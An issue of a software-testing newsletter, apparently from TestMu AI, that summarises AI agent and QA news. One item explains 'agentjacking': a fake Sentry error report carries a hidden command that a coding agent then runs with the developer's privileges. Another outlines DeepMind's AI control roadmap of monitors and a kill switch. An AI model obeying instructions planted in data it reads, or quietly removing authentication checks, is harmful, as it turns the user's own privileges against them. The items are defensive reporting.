CODING JAG - Issue 301

Welcome to the 301st edition of Coding Jag brought to you by TestMu AI!👐

What a week to be an AI agent. OpenAI released a model that hunts and patches security flaws on its own, AWS and GitHub shipped new agent control planes, and then DeepMind admitted it's bracing for its own agents to go rogue. The pattern's hard to miss. As agents start writing and shipping code on their own, the real question isn't what they can do. It's who keeps them in check.

For testers, that's the whole story. Once an agent can grab a ticket, write the code, run the suite, and open the PR while you're at lunch, quality stops being a phase and becomes the control layer. So we've leaned into Agentic QA, Playwright's new test agents, and Microsoft's open-source ASSERT framework for testing whether agents follow the rules, plus a fresh attack class built for the agentic era and an open-weights model from Z.ai beating GPT-5.5 at a sixth of the cost.

📬 Come across something useful or interesting? Just reply and let's exchange ideas.

News

OpenAI Releases GPT-5.5-Cyber With Full Automation for Vulnerability Detection & Patching

10 minChrome-Extensioncybersecuritynews.com

☁️ Guru Baran reports that OpenAI has shipped the full version of GPT-5.5-Cyber, a specialized model that finds and patches software vulnerabilities at machine speed. Highlights include a record 85.6% on the CyberGym benchmark, an updated Codex Security plugin that has already scanned over 30 million commits and auto-resolved more than 500,000 findings, and a deliberately restricted release to verified defenders only, coordinated with US standards bodies under the June 2026 AI security executive order.

Change Your Cyber Risk Strategy to Meet AI Threats, Five Eyes Countries Warn

08 minChrome-Extensioncsoonline.com

☁️ Howard Solomon reports that the US, UK, Canada, Australia, and New Zealand issued a rare joint statement urging leaders to treat AI as an immediate driver of cyber risk. Highlights include warnings that AI is accelerating vulnerability discovery and exploitation, a push to prioritize foundational security controls and accountability, and candid pushback from experts who found parts of the guidance too generic.

AWS Summit New York 2026: New Ways to Make AI Agents More Effective at Work

09 minChrome-Extensionaboutamazon.com

☁️ AWS used its New York Summit to push agents deeper into real work and, notably, into testing. Highlights include autonomous Amazon Quick agents for finance and sales, an expanded AWS DevOps Agent that now runs release-readiness reviews and testing before code ships, and Kiro, its software-development agent, arriving on iOS so you can steer a session from your phone.

xAI Launches /goal in Grok Build for Self-Verifying Autonomous Coding

09 minChrome-Extensionmarktechpost.com

☁️ xAI has given Grok Build, its terminal coding agent, a new mode for taking on long-running tasks and running them with little supervision. Highlights include a /goal command that plans an approach, builds a progress checklist, and works through it step by step; built-in verification where the agent reviews its own code, inspects webpages, or runs scripts before calling a task done; and the freedom to keep adding instructions mid-run, with access gated to SuperGrok and X Premium Plus subscribers.

AI

Z.ai's Open-Weights GLM-5.2 Beats GPT-5.5 on Coding Benchmarks for 1/6th the Cost

09 minChrome-Extensionventurebeat.com

☁️ VentureBeat reports that Z.ai's open-weights GLM-5.2 edges past GPT-5.5 on several long-horizon coding benchmarks at roughly one-sixth the cost. Highlights include a fully permissive MIT license with "no regional limits," a 753B-parameter Mixture-of-Experts design with a 1M-token context, and a top-tier finish on crowdsourced coding and design arenas.

Google DeepMind Unveils a Plan to Protect Itself From Its Own Rogue AI Agents

11 minChrome-Extensionfortune.com

☁️ Google DeepMind published an "AI Control Roadmap" that treats advanced AI agents as potential insider threats, the way a security team treats an employee with sensitive access. Highlights include a threat taxonomy modeled on MITRE ATT&CK covering loss of control, work sabotage, and direct harm; a layered defense of evaluation, monitoring (trusted AI supervising other agents), and an infrastructure-level kill switch when alignment fails; and the disclosure that DeepMind has already screened a million coding-agent tasks to train its monitors. The roadmap is precautionary, tied to no real incident, and is being published so that other labs can adopt it.

Auth, Middleware, and SSO Patterns AI Coding Agents Skip

08 minChrome-Extensiongetautonoma.com

🔐 Tom Piaggio, Co-Founder at Autonoma, breaks down a dangerous pattern: AI coding agents treat authentication middleware like the Clerk wrapper as boilerplate ceremony and quietly strip it out during refactors. TypeScript does not catch it, the build passes, and CI stays green while protected routes silently stop requiring login. The only real fix is an E2E test that asserts on authenticated content and checks for the sign-in redirect.

AI in QA: How Teams Use It in 2026

09 minChrome-Extensiontestmuai.com

☁️ Salman Khan, a Test Automation Evangelist and Community Contributor at TestMu AI, breaks down how teams are actually using AI across the QA lifecycle in 2026, past the hype. Highlights include where AI genuinely saves time in test creation and maintenance, the shift from scripts to natural-language intent, and survey data showing most organizations now use or plan to use AI in their quality work.

A Public Sentry Key Is All It Takes to Hijack Claude Code, Cursor, and Codex

12 minChrome-Extensionthenewstack.io

☁️ Janakiram MSV unpacks "agentjacking," the attack class Tenet Security disclosed this month, where a single fake error report turns your own AI coding agent into the weapon. Highlights include how the booby-trapped error rides in through a public Sentry key and the Sentry MCP connection, then runs with the developer's own privileges; why every step in the chain is "authorized," so EDR, firewalls, and IAM never raise a flag; and the uncomfortable root cause: an agent can't tell the data it reads from an instruction to act, so a command hidden in an error log simply runs. Tenet found 2,388 organizations exposed and an 85% success rate, and has open-sourced drop-in "agent-jackstop" configs to harden Cursor and Claude Code.

Automation

What's New in Playwright 2026: Test Agents, MCP, and ARIA Snapshots

08 minChrome-Extensionqaskills.sh

☁️ QASkills rounds up what's new in Playwright for 2026, now firmly an AI-native framework. Highlights include the planner/generator/healer Test Agents, an official MCP server that lets coding agents drive a real browser through structured accessibility snapshots, and ARIA snapshots for accessibility-tree assertions.

Appium Ships an Official MCP Server and AppClaw, a Natural-Language Agentic Layer for Mobile Tests

08 minChrome-Extensiongithub.com

☁️ Appium now ships an official Model Context Protocol server that lets coding agents like Claude Code and Cursor drive real Android and iOS devices by natural-language description instead of brittle XPath. On top of it, the AppiumTestDistribution team's AppClaw adds a CLI agentic layer where instructions run directly or as plain-English YAML flows.

Tools

Best AI Tools for Customer Support in 2026

09 minChrome-Extensionautomationanywhere.com

⚒️ Anisha Kirpekar breaks down the shift from basic chatbots to full agentic automation in customer support. While most "AI support" tools still just deflect tickets with FAQs, true agentic platforms detect issues, reason through them, and resolve tickets autonomously across CRM, ticketing, and ERP systems. Gartner data shows AI deflects 45% of queries but fully resolves only 14% without human help.

Agent Finder for GitHub Copilot Now Available

07 minChrome-Extensiongithub.blog

☁️ GitHub shipped agent finder, letting Copilot discover the right MCP servers, skills, and tools for a task instead of loading everything up front. Highlights include plain-language capability search, ranked matches pulled in on demand from a registry you choose, and an implementation of the open Agentic Resource Discovery spec built with Google, GoDaddy, Hugging Face, and Microsoft.

Video & Podcast

TestGuild News Show: Is AI Coming for Testers, or Are You About to Win Big?

09 minChrome-Extensionpodcasts.apple.com

☁️ In this 9-minute episode of his TestGuild News Show, Joe Colantonio asks whether testers are first in line to lose work to AI or first in line to win the next big role. Along the way, he covers the selector trap, eating roughly 80% of a team's time and whether Apple's new self-testing agent in Xcode 27 is a genuine leap or just more vibe coding to clean up later.

Software Testing Unleashed: What AI Really Does to Trust and Team Dynamics

08 minChrome-Extensionrichard-seidl.com

☁️ Richard Seidl argues that dropping AI into a team quietly erodes trust, empathy, and the shared mental model, because it strips out the friction teams actually need for innovation. His fix is to stop treating AI as a tool you roll out and start onboarding it like a new team member, with explicit rules for its coordination, creativity, and quality-assurance roles and clear lines on where humans still decide.

Events

AI Testing Conference 2026

07 minChrome-Extensiontestmuai.com

🎤 TestMu Conference 2026 is a free virtual software testing event taking place from August 19 to 21, 2026. Bringing together 75,000+ testers and 100+ expert speakers and sessions, the conference will cover AI in testing, test automation, quality engineering, and the latest trends shaping the future of software quality. Registration is now open and free for all attendees.

IEEE AITest 2026: International Conference on Artificial Intelligence Testing

08 minChrome-Extensioncisose.fit.ac.jp

🎤 The 8th IEEE AITest runs July 27-30, 2026, in Fukuoka, Japan, as part of the IEEE CISOSE congress. Highlights include a program built entirely around the synergy of AI and software testing, sessions on both testing AI applications and using AI techniques to strengthen testing, and a forum where researchers and practitioners trade new methods, tools, and real-world case studies.